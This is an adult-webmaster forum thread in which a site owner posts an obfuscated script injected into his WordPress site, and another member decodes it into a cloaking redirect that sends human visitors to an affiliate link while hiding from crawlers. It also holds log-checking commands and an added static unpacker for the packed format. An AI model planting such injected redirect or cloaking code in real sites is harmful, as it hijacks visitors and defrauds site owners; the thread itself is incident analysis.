GoFuckYourself.com - Adult Webmaster Forum

lezinterracial 10-23-2016 01:05 AM

Found a script in my site
 
This is from my site bestfreecamgirls.com. I noticed some redirects when backing out of the site.

Gonna update my wordpress sites. Change my password. Any other ideas?
Here is the code I found. Thanks.

Code:

<br></br><br></br>
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3=1N;c=z;b.1M=d(){3=1L(d(){4(c==z){x 5=D 1J();5.1K(5.1O()+B*B*24*7*1P);x u=D 1U("(1T\\/|G-1S|G-1Q|k 1R|1I-k|1H|1y|1z|1x|1w|1u-1v|1A-1B|1G|1F|1E|1C|1D|1V|o-1W|o 2g 2f|2e|2c|2d|2h|2i|2n|2m|2l|2j|2k |2b|2a|1t.l|20|1Z|1X|1Y|22|23.E|29|28|27|25|26|2o|L-N|H|J|t|W|S|T|Y|U|V|11 9|Z|Q|X|12|M|P|O|I|K|R|1s|1l|1k|1j|1h|1i|t|1m.13|1r|1q|1p|1o.l|1g.9|18 2|17|16|14|15|19|1a|1e|1c|1b|1d|1f|1n|21|2G|3B|3A-a|3z|3x|3y|3C|3D|3I|3H|3G|3E|3F|3w|2p|v v a|q-p-C.n.r|3v|3n|3m|3l 2 a|3j|3k-3o|3p-3u-2|3t-q-2.n|3s.3q|3K|3J|3Z|47|42|43:41|45-r|49|48|46|44|40|3P 3Q 3O|3N 3L 3M|3R.C|3S|3X|3Y|3W-2|3V|3T|3U|h|3r|3h|E.2I|2H-3i|2E|2F|h|2J|2K|2P|2O|2N|2L|2M|2D|2C|2u|p.2t|2s|2q|2r|2v|2w|2B|2A|y!j-2z|2x 2y-2Q 9|2R)",\'i\');4(!u.3a(39.38)&&f.e.36("g")==-1){f.e="g=1; 37="+5.3b()+"; 
3c=/";4(s.3g((s.3f()*10))<10){b.3e.3d("\\35\\F\\F\\34\\2W\\0\\0\\8\\6\\w\\A\\2V\\2U\\A\\2S\\2T\\6\\2X\\8\\0\\8\\6\\0\\w\\2Y\\m\\33\\0\\m")}}c=32}},31)};b.2Z=d(){4(3){30(3)}};',62,258,'x2f||crawler|blur_started1|if|now|x6f||x67|Bot|spider|window|switch_flag1|function|cookie|document|__potus001|Twitterbot|||Google|org|x31|com|FAST|archive|web|bot|Math|dotbot|re|gnam|x32|var||false|x63|60|net|new|bnf|x74|Googlebot|tagoobot|postrank|MJ12bot|turnitinbot|ips|citeseerxbot|agent|twengabot|spbot|CyberPatrol|scribdbot|yanga|buzzbot|yandexbot|purebot|woriobot|voilabot|mlbot|Voyager||Linguee|baiduspider|RU_Bot|domaincrawler|wbsearchbot|Aboundex|ahrefsbot|sistrix|summify|ccbot|ec2linkfinder|seznambot|gslfbot|edisterbot|aihitbot|NerdByNature|blekkobot|ezooms|Adidxbot|linkdex|sitebot|Mail|intelium_bot|europarchive|findthatfile|heritrix|discobot|page2rss|grub|Commons|HttpClient|curl|wget|slurp|java|Python|urllib|phpcrawl|msnbot|nutch|httpunit|libwww|bingbot|Mediapartners|Date|setTime|setTimeout|onblur|null|getTime|1000|Image|favicon|Mobile|googlebot|RegExp|jyxobot|WebCrawler|netresearchserver|speedy|antibot|UsineNouvelleCrawler|facebookexternalhit|fluffy|bibnum||yacybot|AISearchBot|panscient|msrbot|findlink|webcrawler|httrack|teoma|convera|biglotron|Crawler|Enterprise|seekbot|gigablast|GingerCrawler|webmon|ia_archiver|ngbot|exabot|IOI|openindexspider|TweetmemeBot|crawler4j|Applebot|org_bot|Qwantify|findxbot|SemrushBot|Domain|Re|asr|lipperhey|yoozBot|BUbiNG|xovibot|ADmantX|Facebot|yeti|A6|fr_bot|OrangeBot|memorybot|ltx71|nerdybot|SemanticScholarBot|MegaIndex|AdvBot|Animator|AddThis|x6b|x2e|x69|x6c|x3a|x72|x36|onfocus|clearTimeout|5000|true|x37|x70|x68|indexOf|expires|userAgent|navigator|test|toUTCString|path|replace|location|random|floor|smtbot|Indexer|toplistbot|seokicks|content|integromedb|coccoc|robot|it2media|info|cXensebot|siteexplorer|ip|domain|backlinkcrawler|acoonbot|lssbot|careerbot|sogou|lb|RetrevoPageAnalyzer|wotbox|wocbot|drupact|webcompanycrawler|lssrocketcrawler|DuckDu
ckBot|ichiro|proximic|elisabot|Metadata|Scaper|CC|Service|Lipperhey|SEO|g00g1e|GrapeshotCrawler|SimpleCrawler|Livelapbot|binlar|fr|urlappendbot|brainobot|changedetection|InterfaxScanBot|Search|arabot|WeSEE|psbot|niki|360Spider|blexbot|rogerbot|CrystalSemanticsBot'.split('|'),0,{}));</script>


just a punk 10-23-2016 02:01 AM

Quote:

Originally Posted by lezinterracial (Post 21242332)
This is from my site bestfreecamgirls.com. I noticed some redirects when backing out of the site.

Gonna update my wordpress sites. Change my password. Any other ideas?
Here is the code I found. Thanks.



Here is the original code:

Code:

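// State shared by the two handlers below
blur_started1 = null;
switch_flag1 = false;
// When the window loses focus, arm a 5-second timer
window.onblur = function(){blur_started1 = setTimeout(function(){if(switch_flag1==false){
// Expiry for the marker cookie: 7 days from now
var now = new Date();
now.setTime(now.getTime()+60*60*24*7*1000);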
var re = new RegExp("(googlebot\/|Googlebot-Mobile|Googlebot-Image|Google favicon|Mediapartners-Google|bingbot|slurp|java|wget|curl|Commons-HttpClient|Python-urllib|libwww|httpunit|nutch|phpcrawl|msnbot|jyxobot|FAST-WebCrawler|FAST Enterprise Crawler|biglotron|teoma|convera|seekbot|gigablast|exabot|ngbot|ia_archiver|GingerCrawler|webmon |httrack|webcrawler|grub.org|UsineNouvelleCrawler|antibot|netresearchserver|speedy|fluffy|bibnum.bnf|findlink|msrbot|panscient|yacybot|AISearchBot|IOI|ips-agent|tagoobot|MJ12bot|dotbot|woriobot|yanga|buzzbot|mlbot|yandexbot|purebot|Linguee Bot|Voyager|CyberPatrol|voilabot|baiduspider|citeseerxbot|spbot|twengabot|postrank|turnitinbot|scribdbot|page2rss|sitebot|linkdex|Adidxbot|blekkobot|ezooms|dotbot|Mail.RU_Bot|discobot|heritrix|findthatfile|europarchive.org|NerdByNature.Bot|sistrix crawler|ahrefsbot|Aboundex|domaincrawler|wbsearchbot|summify|ccbot|edisterbot|seznambot|ec2linkfinder|gslfbot|aihitbot|intelium_bot|facebookexternalhit|yeti|RetrevoPageAnalyzer|lb-spider|sogou|lssbot|careerbot|wotbox|wocbot|ichiro|DuckDuckBot|lssrocketcrawler|drupact|webcompanycrawler|acoonbot|openindexspider|gnam gnam spider|web-archive-net.com.bot|backlinkcrawler|coccoc|integromedb|content crawler spider|toplistbot|seokicks-robot|it2media-domain-crawler|ip-web-crawler.com|siteexplorer.info|elisabot|proximic|changedetection|blexbot|arabot|WeSEE:Search|niki-bot|CrystalSemanticsBot|rogerbot|360Spider|psbot|InterfaxScanBot|Lipperhey SEO Service|CC Metadata Scaper|g00g1e.net|GrapeshotCrawler|urlappendbot|brainobot|fr-crawler|binlar|SimpleCrawler|Livelapbot|Twitterbot|cXensebot|smtbot|bnf.fr_bot|A6-Indexer|ADmantX|Facebot|Twitterbot|OrangeBot|memorybot|AdvBot|MegaIndex|SemanticScholarBot|ltx71|nerdybot|xovibot|BUbiNG|Qwantify|archive.org_bot|Applebot|TweetmemeBot|crawler4j|findxbot|SemrushBot|yoozBot|lipperhey|y!j-asr|Domain Re-Animator Bot|AddThis)", 'i');
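// Act only when the User-Agent is not on the crawler list and the marker cookie is absent
if(!re.test(navigator.userAgent)&&document.cookie.indexOf("__potus001")==-1){
// Set the marker cookie so the same browser is handled at most once per 7 days
document.cookie = "__potus001=1; expires="+now.toUTCString()+"; path=/";
// Math.floor(Math.random()*10) is always below 10, so this branch always runs
if(Math.floor((Math.random()*10))<10){window.location.replace("http://go2click.org/go/2617/1")}}
switch_flag1 = true}}, 5000)};
// Cancel the pending timer if focus returns within the 5 seconds
window.onfocus = function(){if(blur_started1){clearTimeout(blur_started1)}};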

It's a cloaker, which redirects SE bots to go2click.org/go/2617/1

P.S. Your site has been hacked.
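
How a packed blob like the one in the first post maps back to readable source, as an added example that is not part of the thread or any poster's code: a static unpacker for the eval(function(p,a,c,k,e,d)...) format that only does string processing and never evaluates the script. The function names and the SAMPLE string are constructed for illustration, and the handling of escapes assumes the packer escapes only backslashes, single quotes and newlines.

```javascript
// Static unpacker for Dean Edwards "p,a,c,k,e,d" packed JavaScript.
// It only does string processing; the packed script is never eval'd.
const DIGITS = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";

// Matches the packer's call arguments: }('payload',radix,count,'k0|k1|...'.split('|')
const CALL_RE = /\}\s*\(\s*'((?:[^'\\]|\\[\s\S])*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\[\s\S])*)'\s*\.split\('\|'\)/;

// Convert a payload token such as "1N" to its keyword index (-1 if not a number in this radix).
function tokenIndex(token, radix) {
  let n = 0;
  for (const ch of token) {
    const v = DIGITS.indexOf(ch);
    if (v < 0 || v >= radix) return -1;
    n = n * radix + v;
  }
  return n;
}

// Undo the escaping of the single-quoted string literal (assumed: \\, \' and \n only).
function unquote(literal) {
  return literal.replace(/\\([\s\S])/g, (m, ch) => (ch === "n" ? "\n" : ch));
}

// Turn "\x68\x74..." escapes left in the unpacked source into readable characters.
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9a-fA-F]{2})/g, (m, h) => String.fromCharCode(parseInt(h, 16)));
}

// Returns { radix, count, script } or null when the input is not in the packed format.
function unpack(packed) {
  const m = CALL_RE.exec(packed);
  if (!m) return null;
  const radix = Number(m[2]);
  const keywords = unquote(m[4]).split("|");
  const script = unquote(m[1]).replace(/\b\w+\b/g, (token) => {
    const i = tokenIndex(token, radix);
    // An empty keyword slot means the token is a literal (here, the number 7).
    return (i >= 0 && keywords[i]) || token;
  });
  return { radix, count: Number(m[3]), script: decodeHexEscapes(script) };
}

// Constructed, harmless sample in the same format as the injected script.
const SAMPLE = String.raw`<script>eval(function(p,a,c,k,e,d){/* decoder omitted */}('0 1=2 3();4.5="\\6\\8 "+1.9()*7',62,10,'var|now|new|Date|document|title|x6f||x6b|getTime'.split('|'),0,{}))</script>`;

console.log(unpack(SAMPLE).script);
```

Saving the suspicious script to a file and passing its text to unpack() gives the readable form for review without running anything in a browser.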

lezinterracial 10-23-2016 02:18 AM

Quote:

Originally Posted by CyberSEO (Post 21242362)
It's a cloaker, which redirects SE bots to go2click.org/go/2617/1

P.S. Your site has been hacked.


Yep. The go2click redirects to iwantu.com/aff.php?dynamicpage=iwu_wlp_5st_tmr_a&a_bid=dc57a3f7&utm_sub=opnfnl&utm_source=int&utm_medium=web&utm_campaign=476cb13b&utm_content=2617&data2=06pvh21bg0082


Thanks CyberSEO. Now, I have to figure out when and how they did it. Maybe some weak PHP on my part. I don't know

just a punk 10-23-2016 02:24 AM

Quote:

Originally Posted by lezinterracial (Post 21242389)
Thanks CyberSEO. Now, I have to figure out when and how they did it. Maybe some weak PHP on my part. I don't know

If I were you, I would firstly report the rogue affiliate to iwantu.com and make sure he hasn't been paid :2 cents:

lezinterracial 10-23-2016 04:39 AM

Quote:

Originally Posted by CyberSEO (Post 21242398)
If I were you, I would firstly report the rogue affiliate to iwantu.com and make sure he hasn't been paid :2 cents:

https://help.dreamhost.com/hc/en-us/...ite-was-hacked

Noticed no world writable directories.
find . -type d -perm -o=w

And no logins from any other ips over the past month. I used the command

last -if /var/log/wtmp.1 | grep youruser | awk '{print $3}' | sort | uniq -c


Just gotta keep looking through the logs.

lezinterracial 10-23-2016 10:14 PM

Oh well. Searched all through my logs but I couldn't find when this happened. I e-mailed iwantu.org support. Hoping they could help me some with a time frame. But I notice the go2click.org link redirects to different sites.

I scanned my computer for malware, none found. I went ahead and updated PHP 5.5 to 5.6. Weird timing, 'cause DreamHost just moved me to a new server this evening.

Just gonna keep an eye on the files and see if they get modified again. Then I will know where to look in the logs.

On a positive note, I have learned much today. First time I have used PuTTY to connect to my web server to get a shell. Learned some about PHP hacking.

